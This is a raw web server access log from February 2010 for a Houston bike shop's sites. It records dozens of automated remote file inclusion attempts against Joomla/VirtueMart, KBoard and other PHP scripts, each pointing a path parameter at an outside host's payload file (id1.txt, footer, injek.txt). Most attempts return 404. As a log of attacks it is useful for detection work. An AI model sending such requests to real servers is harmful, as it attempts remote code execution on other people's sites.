62.140.23.24 - - [10/Feb/2010:08:24:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.195 - - [10/Feb/2010:08:25:58 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.195 - - [10/Feb/2010:08:25:58 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.195 - - [10/Feb/2010:08:25:58 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:28:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:28:03 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:28:03 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [10/Feb/2010:08:28:11 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [10/Feb/2010:08:28:11 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [10/Feb/2010:08:28:12 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:35:41 -0800] "GET /logs/access.log%20%20/?error=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:35:41 -0800] "GET /?error=http://imran-project.com/css/id1.txt???? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:35:41 -0800] "GET /logs/?error=http://imran-project.com/css/id1.txt???? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:41:28 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:41:28 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:41:28 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:41:36 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:41:36 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:41:36 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [10/Feb/2010:08:42:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.bicyclestoreshouston.com"
72.55.191.4 - - [10/Feb/2010:08:43:13 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:43:13 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:43:13 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:43:14 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:43:14 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:43:16 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:51:23 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:51:23 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:51:23 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:51:41 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:51:41 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:51:41 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.109.216 - - [10/Feb/2010:08:52:20 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.109.216 - - [10/Feb/2010:08:52:20 -0800] "GET /include/write.php?dir=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.109.216 - - [10/Feb/2010:08:52:20 -0800] "GET /logs//include/write.php?dir=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.109.216 - - [10/Feb/2010:08:54:26 -0800] "GET /include/write.php?dir=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.109.216 - - [10/Feb/2010:08:54:26 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.109.216 - - [10/Feb/2010:08:54:26 -0800] "GET /logs//include/write.php?dir=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:55:53 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:08:58:03 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.93 - - [10/Feb/2010:09:01:29 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.93 - - [10/Feb/2010:09:01:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.93 - - [10/Feb/2010:09:01:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.93 - - [10/Feb/2010:09:02:03 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.93 - - [10/Feb/2010:09:02:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.93 - - [10/Feb/2010:09:02:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:09:06:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:06:18 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:06:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:06:18 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:09:41 -0800] "GET /logs/scripts.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:09:09:41 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:09:09:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
58.150.99.131 - - [10/Feb/2010:09:10:40 -0800] "GET /skin/daerew_47gallery_GD/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:09:10:40 -0800] "GET /logs/access.log%20%20//skin/daerew_47gallery_GD/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:09:10:43 -0800] "GET /logs//skin/daerew_47gallery_GD/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:10:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:09:10:48 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:09:10:48 -0800] "GET /logs/scripts.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
58.150.99.131 - - [10/Feb/2010:09:10:52 -0800] "GET /skin/daerew_47gallery_GD/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:09:10:52 -0800] "GET /logs//skin/daerew_47gallery_GD/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:09:10:53 -0800] "GET /logs/access.log%20%20//skin/daerew_47gallery_GD/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:09:13:50 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:09:13:50 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:09:13:50 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:09:15:08 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:09:15:08 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:09:15:08 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:15:49 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.233.3.101 - - [10/Feb/2010:09:16:51 -0800] "GET /index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.233.3.101 - - [10/Feb/2010:09:16:51 -0800] "GET /logs/access.log//index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.233.3.101 - - [10/Feb/2010:09:16:51 -0800] "GET /logs//index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:17:10 -0800] "GET /logs/scripts.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.126.254.164 - - [10/Feb/2010:09:20:52 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:22:02 -0800] "GET /logs/scripts.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
24.23.78.174 - - [10/Feb/2010:09:27:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
211.115.68.54 - - [10/Feb/2010:09:27:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.68.54 - - [10/Feb/2010:09:27:36 -0800] "GET /skin/zero_vote/error.php?dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.68.54 - - [10/Feb/2010:09:27:36 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:09:28:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:28:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:28:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:28:28 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:09:31:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:09:31:36 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:09:31:36 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:09:32:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:09:32:59 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:09:32:59 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.207.121 - - [10/Feb/2010:09:34:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "svbikes.com"
67.23.18.60 - - [10/Feb/2010:09:34:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:34:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:34:08 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:34:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:34:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:34:21 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:34:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:34:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:09:34:51 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:35:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:35:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:35:19 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:35:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:35:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:35:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:36:29 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:36:41 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:09:36:44 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:09:37:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "bicyclestoreshouston.com"
67.23.18.60 - - [10/Feb/2010:09:38:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
